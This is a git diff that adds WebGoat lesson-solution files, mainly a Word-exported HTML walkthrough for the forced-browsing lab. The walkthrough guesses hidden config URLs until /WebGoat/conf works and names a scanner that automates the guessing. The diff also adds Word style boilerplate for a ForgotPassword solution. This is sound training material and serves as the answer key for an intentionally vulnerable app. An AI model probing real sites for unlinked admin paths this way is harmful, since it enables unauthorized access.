+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform Forced Browsing Attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>Concept
+/ Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>How
+to Exploit Forced Browsing. <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>How
+the attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Forced
+browsing is a technique used by attackers to gain access to resources that are
+not referenced, but are nevertheless accessible. One technique is to manipulate
+the URL in the browser by deleting sections from the end until an unprotected
+directory is found <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->Your
+goal should be to try to guess the URL for the &quot;config&quot; interface.<br>
+The &quot;config&quot; URL is only available to the maintenance personnel.<br>
+The application doesn't check for horizontal privileges.</span><span
+style='font-family:"Arial","sans-serif";mso-fareast-language:JA'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype
+ id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
+ path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_97" o:spid="_x0000_i1028" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image002.jpg" v:shapes="Picture_x0020_97"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>1</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Insecure configuration
+management – Forced Browsing</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-bidi-font-weight:bold'>If you want to access a restricted page, you need to
+be able to guess the URI to access the page, for example /admin.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-bidi-font-weight:bold'>In this environment, WebGoat consists of different
+servlets that live in the WebGoat application. The main servlet is /attack,
+what could be the servlet for config?<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-bidi-font-weight:bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-bidi-font-weight:bold'>Try to access /WebGoat/config,
+/WebGoat/configuration, /WebGoat/conf, ….<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
+mso-bidi-font-weight:bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><b
+style='mso-bidi-font-weight:normal'><span style='font-family:"Arial","sans-serif";
+mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_98" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image004.jpg" v:shapes="Picture_x0020_98"><![endif]></span></b></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>2</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> No /WebGoat/config</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_99"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image006.jpg" v:shapes="Picture_x0020_99"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>3</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> No /WebGoat/configuration</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_100"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image008.jpg" v:shapes="Picture_x0020_100"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>4</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Bingo for /WebGoat/conf</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>This
+could be automated with a tool like Wikto 2.0<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/filelist.xml b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/filelist.xml
new file mode 100644
index 000000000..6616ecc49
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/filelist.xml
@@ -0,0 +1,14 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../ForcedBrowsing.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image001.png b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image001.png
new file mode 100644
index 000000000..c9047d693
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image002.jpg b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image002.jpg
new file mode 100644
index 000000000..101e688a4
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image003.png b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image003.png
new file mode 100644
index 000000000..569dc0098
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image004.jpg b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image004.jpg
new file mode 100644
index 000000000..6fe272fa4
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image005.png b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image005.png
new file mode 100644
index 000000000..f2945e2b0
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image006.jpg b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image006.jpg
new file mode 100644
index 000000000..7ec274b62
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image007.png b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image007.png
new file mode 100644
index 000000000..a001e7963
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image008.jpg b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image008.jpg
new file mode 100644
index 000000000..672f7af05
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/themedata.thmx b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForcedBrowsing_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword.html b/main/project/WebContent/lesson_solutions/ForgotPassword.html
new file mode 100644
index 000000000..5cacb7445
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ForgotPassword.html
@@ -0,0 +1,828 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/ForgotPassword_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ForgotPassword_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>24</o:TotalTime>
+  <o:Created>2007-07-11T10:50:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:34:00Z</o:LastSaved>
+  <o:Pages>4</o:Pages>
+  <o:Words>260</o:Words>
+  <o:Characters>1482</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>12</o:Lines>
+  <o:Paragraphs>3</o:Paragraphs>
+  <o:CharactersWithSpaces>1739</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/ForgotPassword_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ForgotPassword_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
